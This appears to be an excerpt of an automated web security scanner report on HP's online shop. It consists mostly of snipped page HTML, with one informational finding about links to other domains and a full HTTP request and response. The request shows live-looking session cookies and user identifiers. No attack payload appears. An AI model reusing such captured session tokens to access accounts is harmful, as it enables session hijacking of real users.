<a href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a1_70.gif"    width="70" height="70" border="0"    title="All accessories"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_storage" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a2_70.gif"    width="70" height="70" border="0"    title="Storage"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_peripherals" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a3_70.gif"    width="70" height="70" border="0"    title="Keyboards & Mice"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_accessories"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a4_70.gif"    width="70" height="70" border="0"    title="Deals on accessories"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_carrying_cases" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a5_70.gif"    width="70" height="70" border="0"    title="Cases"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/networking/2/accessories?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_networking" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a6_70.gif" width="70"    height="70"    border="0" title="Networking"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_pc_audio" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a7_70.gif" width="70"    height="70"    border="0" title="PC Audio"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/touchpad?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_touchpad_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a8_70.gif" width="70"    height="70"    border="0" title="TouchPad accessories"></a>
...[SNIP]...
//www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc1_70.gif"    width="70" height="70" border="0"    title="Laptop PCs and netbooks"></a>
...[SNIP]...
shopping/can.do?storeName=storefronts&landing=rts_notebook&category=rts_notebook&a1=Category&v1=business&catLevel=2#bcAnchor&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_elitebook" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc2_70.gif"    width="70" height="70" border="0"    title="Elitebook and Probook business laptop PCs"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/esp?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc3_70.gif"    width="70" height="70" border="0"    title="HP Care Pack Services"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=servers&a1=See%20all&v1=series&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_home_servers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc4_70.gif"    width="70" height="70" border="0"    title="Servers"></a>
...[SNIP]...
p://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc5_70.gif"    width="70" height="70" border="0"    title="Desktop and all-in-one PCs"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=storefronts&landing=display&category=display&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc6_70.gif"    width="70" height="70" border="0"    title="Monitors"></a>
...[SNIP]...
="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=office&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc7_70.gif"    width="70" height="70" border="0"    title="Printers and all-in-ones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=all_supplies&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_ink_and_toner" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc8_70.gif "    width="70" height="70" border="0"    title="Ink, Toner & Paper"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs1_70.gif" width="70"    height="70"    border="0" title="Quick-ship laptops PCs available to ship within 24 hours"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs2_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/express_store.do?landing=express_store&selectMenu=specialty_store&jumpid=in_R329_prodexp/hhoslp/split/lateralnav_quick_ship_products" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs3_70.gif" width="70"    height="70"    border="0" title="All Quick-ship products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/offers_guide.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_hot_offers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do1_70.gif" width="70"    height="70"    border="0" title="HP and partner offers on current products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/outlet?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_outlet_centre"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do2_70.gif" width="70"    height="70"    border="0" title="Markdowns and closeout deals"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mpr" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do3_70.gif" width="70"    height="70"    border="0" title="Exclusive offers on ink, toner, and paper"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/split/lateralnav_deals_banner/sitewide_top_nav_banner_xbox_offer_911" title='Click to see details'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/topnav_sitewide_250x50_091111.jpg" width="250" height="50" border="0" alt="Click to see details" title ="Click to see details" longdesc=""></a>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ri/mootools-1.2.2-core-jm.js'></script>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="6"><h1>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="1"></td>
<td width="2" class="bold" valign="top"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15"><br>
...[SNIP]...
<br><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt="" longdesc=""></td>
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/mda_white_browse_214x60.gif" title="HP recommends Windows&#0174; 7" width="214" height="60"></td>
...[SNIP]...
<p class="w804" align="left" style="background: url('http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/free_shipping_top_bkgd_35.gif');"><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deal_accyDeal_valueProp_g_812x35.jpg" width="804" height="35" border="0" alt="Why buy accessories & electronics from HP Home & Home Office?" title ="Why buy accessories & electronics from HP Home & Home Office?" longdesc=""></p>
...[SNIP]...
pping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/specialty_stores/design_center/top_banner/1/acc_page_banner_Accessory_Sale_918" title='Click to participate in the accessory sale'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deals_r1_804x285_091811.jpg" width="804" height="285" border="0" alt="Click to participate in the accessory sale" title ="Click to participate in the accessory sale" longdesc=""></a>
...[SNIP]...
ng_cases&jumpid=in_R329_prodexp/hhoslp/specialty_stores/design_center/top_banner/2/computer_accessories_top2_Save_20%_on_select_Carrying_cases_918" title='Click to save 20% on select Carrying cases
'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deals_r2_804x285_091811.jpg" width="804" height="285" border="0" alt="Click to save 20% on select Carrying cases
" title ="Click to save 20% on select Carrying cases
" longdesc="">
</a>
...[SNIP]...
<ul class="ULbody2">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" wmode="transparent" width="804" height="222">
<param name="movie" value="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/swf/accessories_navigation.swf?hpUrl=http%3A%2F%2Fwww.shopping.hp.com/webapp/shopping&userTier=">
...[SNIP]...
<param name="FlashVars" value="hpUrl=http://www.shopping.hp.com/webapp/shopping&userTier=">
<embed src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/swf/accessories_navigation.swf?hpUrl=http%3A%2F%2Fwww.shopping.hp.com/webapp/shopping&userTier=" FlashVars="hpUrl=http://www.shopping.hp.com/webapp/shopping&userTier=" width="804" height="222" allowscriptaccess="always" wmode="transparent" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"></embed>
</object><script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ieupdate.js"></script>
...[SNIP]...
<a href="http://www.shopping.hp.com/store/product/product_detail/BV704AA%2523ABA/1?jumpid=in_r329_personalization/browse1/home_PDP"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/featured_fmt/bv704aa_main.jpg" width="50" height="50" longdesc="" alt="Click to see HP Pavilion p7-1020 Desktop PC" border="0" ></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/series/category/desktops/p7xt_series/3/computer_store?jumpid=in_r329_personalization/browse2/home_SDP"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/featured_fmt/lp011av_main.jpg" width="50" height="50" longdesc="" alt="Click to see p7xt series" border="0" ></a>
...[SNIP]...
<a href="/webapp/shopping/mpss_portal.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/mpss/tile_MPR6.gif" alt="My Print Rewards. Exclusive offers on ink, toner, and paper. Learn more." border="0" longdesc=""></a>
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" title="Follow us on Facebook" class="socialIcon"/></a>
...[SNIP]...
<a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" class="socialIcon" /></a>
...[SNIP]...
a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="Subscribe to our RSS feed" title="Subscribe to our RSS feed" class="socialIcon" /></a>
...[SNIP]...
e.jsp&webChat=0&click2Call=1','custOptionWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0, menubar=0, width=850,height=300,left=200,top=100')" title="Customer Help Option Link"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_live_assist.gif" longdesc="" alt="Customer Help Option Link" border="0" style="vertical-align:middle;"></a>
...[SNIP]...
ycleyourPC','recycleYourPCWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=850,height=500,left=200,top=100')" title="Free PC Recycling Assistance" class="bold"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_pc_recycle.gif" longdesc="" alt="Free PC Recycling Assistance" border="0" style="vertical-align:middle;"></a>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html#Explore"
target="LUCWindow"
title="Learn, Use, &amp; Create" />
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/LightBulb.gif"
style="vertical-align:middle;"
border=0
longDesc=""
alt="Learn, Use, &amp; Create">

</a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_top_rated_prod.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Shop Top Rated"></a>
...[SNIP]...
</SCRIPT>

<script type="text/javascript" language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js'></script>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/home.do?jumpid=in_R329_prodexp/hhoslp/psg/bottomnav_home"> <img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif" title="Home" width="17" height="20" border="0"/><span class="screenReading" style="font-size:105%;">
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" alt="Follow us on Facebook" title="Follow us on Facebook" /></a>
           <a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" /></a>
           <a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="RSS" title="RSS" /></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/catalogRequest.do?jumpid=in_R329_prodexp/hhoslp/footer_request_catalog"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_request_catalog.gif" alt="Request a Catalog" title="Request a Catalog"/></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/footer_my_print_rewards"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_mpr.gif" alt="My Print Rewards" title="My Print Rewards"/></a>
...[SNIP]...
<span class="icon"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_phone.gif" valign="middle" alt="Call us at 1 (888) 999-4747" title="Call us at 1 (888) 999-4747" /></span>
...[SNIP]...
<a href="#" onClick="submitLAForm('SALES_CALLBACK')"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_callback.gif" width="25"    height="25"    border="0" align="absmiddle" title="Request a call with an agent"></a>
...[SNIP]...
<a href="/webapp/shopping/feedback.do?jumpid=in_R329_prodexp/hhoslp/footer_email"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_emailus.gif" valign="absmiddle" alt="Email us" title="Email us"/></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/order_status_sign_in.do?jumpid=in_R329_prodexp/hhoslp/footer_order_status"><img class="img-size" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_orderstatus.gif" valign="absmiddle" alt="Order status" title="Order status" /></a>
...[SNIP]...
</script>


<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/cma/region/na/metricsHHOstore.js"></script>


<script type="text/javascript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ri/main.js'></script>
...[SNIP]...
</script>


<script language="JavaScript" src="http://cts.channelintelligence.com/9919466_landing.js"></script>
...[SNIP]...

7.5. http://www.shopping.hp.com/desktops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<!--stopindex-->


<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_screen_003366.css" rel="stylesheet" type="text/css" media="screen">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_handheld_003366.css" rel="stylesheet" type="text/css" media="handheld">
<link href="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/css/hp_print_003366.css" rel="stylesheet" type="text/css" media="print">


<script language="JavaScript">
...[SNIP]...
<!--stopindex-->

<script language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js"></script>
<script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/search_utils.js"></script>
...[SNIP]...
<a href="http://www.hp.com/?mtxs=logo&mtxb=store&jumpid=in_R329_prodexp%2Fhhoslp%2Fsplit%2Fhome" title="HP.com home"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_logo_new.png" alt="HP.com home" border="0"></a>
...[SNIP]...
<h2 class="themeheader mb10" style="float: left; width: 73%;">


<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/topnav_phone_icon.gif" height="20px" width="20px" align="absmiddle" alt="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este">

<span title="Call an HP Home & Home Office agent now.&#10Espa&ntilde;ol disponible, lunes a viernes 11 am -- 8 pm, hora del Este" alt="Call an HP Home & Home Office agent now.&#10Espa&ntil
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;
<a href="http://www.shopping.hp.com/webapp/shopping/help.do" class="themelink">
...[SNIP]...
</a>&nbsp;&nbsp;<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/redesign/white_line.gif" height="10" width="1" alt="">&nbsp;&nbsp;<span id="signInLink">
...[SNIP]...
<span class="shopCart"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="14" height="13" border="0" alt="No items added to the cart"></span>
...[SNIP]...
<!-- Modified    for    NG3    -->


<script    type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/topNav.js"></script>
...[SNIP]...
<h4 class="navDropdownsLink"    style="padding: 4px 10px;"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif"    title="Home" width="17"    height="20"    border="0"/></h4>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Mini&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mini_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb1_70.gif" width="70"    height="70"    border="0" title="Mini Netbooks"></a>
...[SNIP]...
app/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb2_70.gif" width="70"    height="70"    border="0" title="Everyday Computing laptop PCs"></a>
...[SNIP]...
hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=Ultra-Portable&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_ultra-portable_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb3_70.gif" width="70"    height="70"    border="0" title="Ultra-Portable laptop PCs"></a>
...[SNIP]...
/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb4_70.gif" width="70"    height="70"    border="0" title="High Performance laptop PCs"></a>
...[SNIP]...
http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=ENVY&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_envy_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb5_70.gif" width="70"    height="70"    border="0" title="ENVY laptop PCs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_notebook_batteries" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb6_70.gif" width="70"    height="70"    border="0" title="Laptop batteries"></a>
...[SNIP]...
p/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=See%20all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_laptop_mini_netbook_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb7_70.gif" width="70"    height="70"    border="0" title="All customizable laptop PCs"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb8_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ebapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt1_70.gif" width="70"    height="70"    border="0" title="Everyday computing desktop pcs"></a>
...[SNIP]...
g.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Slim%20and%20sleek&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_slim_sleek_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt2_70.gif" width="70"    height="70"    border="0" title="Slim and sleek desktop PCs"></a>
...[SNIP]...
ing.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_in_one_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt3_70.gif" width="70"    height="70"    border="0" title="All-in-One pcs"></a>
...[SNIP]...
.com/webapp/shopping/store_access.do?template_type=computer_store&landing=desktops&a1=Category&v1=TouchSmart%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_TouchSmart_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt4_70.gif" width="70"    height="70"    border="0" title="TouchSmart All-in-One PCs"></a>
...[SNIP]...
om/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt5_70.gif" width="70"    height="70"    border="0" title="High performance desktop PCs"></a>
...[SNIP]...
ng.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=See+all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_desktop_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt6_70.gif" width="70"    height="70"    border="0" title="All customizable desktop PCs "></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt7_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/display/display/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt8_70.gif" width="70"    height="70"    border="0" title="Monitors"></a>
...[SNIP]...
